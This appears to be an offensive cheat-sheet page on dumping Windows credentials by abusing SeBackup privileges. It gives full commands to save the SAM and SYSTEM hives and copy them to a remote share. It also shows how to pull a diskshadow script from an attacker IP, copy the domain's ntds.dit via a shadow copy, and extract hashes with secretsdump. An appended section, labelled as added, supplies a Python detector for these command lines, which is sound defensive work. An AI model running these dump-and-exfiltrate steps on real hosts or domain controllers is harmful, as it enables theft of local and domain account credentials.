>_ shadow.red

SeBackup / SeRestore - SAM/NTDS Dump


Quick local SAM/SYSTEM dump (when SeBackup is held)

cd c:\
mkdir temp
cd temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
copy sam,system \\TSCLIENT\share\

Then on Kali:

impacket-secretsdump -sam sam -system system local

diskshadow + robocopy for NTDS.dit

Create viper.dsh:

set context persistent nowriters
add volume c: alias viper
create
expose %viper% x:

Convert the script to DOS (CRLF) line endings before transferring it:

unix2dos viper.dsh

On the target:

iwr -uri http://10.13.31.108/viper.dsh -o viper.dsh
diskshadow /s viper.dsh
robocopy /b x:\windows\ntds . ntds.dit
reg save hklm\system c:\windows\temp\system

Then on Kali:

secretsdump.py -ntds ntds.dit -system system local
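
Detection-side view of both procedures above, as an added example that is not part of the original page: a small matcher for process-creation command lines (for example Sysmon Event ID 1 or Security 4688 with command-line auditing) that flags the `reg save`, `diskshadow /s` and `robocopy /b` invocations shown here and reports hosts where the full NTDS chain appears. The rule names, event field names and sample records are assumptions constructed for illustration.

```python
import re

# Registry hives whose offline copies yield local account hashes / the boot key.
HIVE = re.compile(r"^(hklm|hkey_local_machine)\\(sam|system|security)$")

def classify(cmdline):
    """Return the rule names a process command line matches (empty list if none)."""
    tokens = cmdline.lower().replace('"', "").split()
    if not tokens:
        return []
    exe = tokens[0].rsplit("\\", 1)[-1]       # drop directory part, if any
    if exe.endswith(".exe"):
        exe = exe[:-4]
    args = tokens[1:]
    hits = []
    if exe == "reg" and "save" in args and any(HIVE.match(a) for a in args):
        hits.append("reg-save-hive")
    if exe == "diskshadow" and ("/s" in args or "-s" in args):   # script mode
        hits.append("diskshadow-script")
    if exe == "robocopy" and "/b" in args and any("ntds" in a for a in args):
        hits.append("robocopy-backup-ntds")
    return hits

def scan(events):
    """Map each host to the set of rules that fired on it."""
    fired = {}
    for ev in events:
        for rule in classify(ev["cmdline"]):
            fired.setdefault(ev["host"], set()).add(rule)
    return fired

def ntds_chain_hosts(events):
    """Hosts where a scripted shadow copy AND a backup-mode NTDS copy were both seen."""
    chain = {"diskshadow-script", "robocopy-backup-ntds"}
    return sorted(h for h, rules in scan(events).items() if chain <= rules)

# Constructed sample process-creation records (hosts and field names are assumptions).
SAMPLE_EVENTS = [
    {"host": "DC01", "cmdline": r"C:\Windows\System32\diskshadow.exe /s viper.dsh"},
    {"host": "DC01", "cmdline": r"robocopy /b x:\windows\ntds . ntds.dit"},
    {"host": "DC01", "cmdline": r"reg save hklm\system c:\windows\temp\system"},
    {"host": "WS07", "cmdline": r"reg save hklm\sam c:\Temp\sam"},
    {"host": "WS07", "cmdline": r"robocopy c:\data d:\backup /mir"},
    {"host": "FS02", "cmdline": r"reg query hklm\software\microsoft"},
]

if __name__ == "__main__":
    for host, rules in sorted(scan(SAMPLE_EVENTS).items()):
        print(host, sorted(rules))
    print("NTDS extraction chain:", ntds_chain_hosts(SAMPLE_EVENTS))
```

Matching is on the executable's file name and arguments only, so a renamed binary is missed; pairing these rules with an audit of which accounts hold SeBackupPrivilege narrows who can run the chain at all.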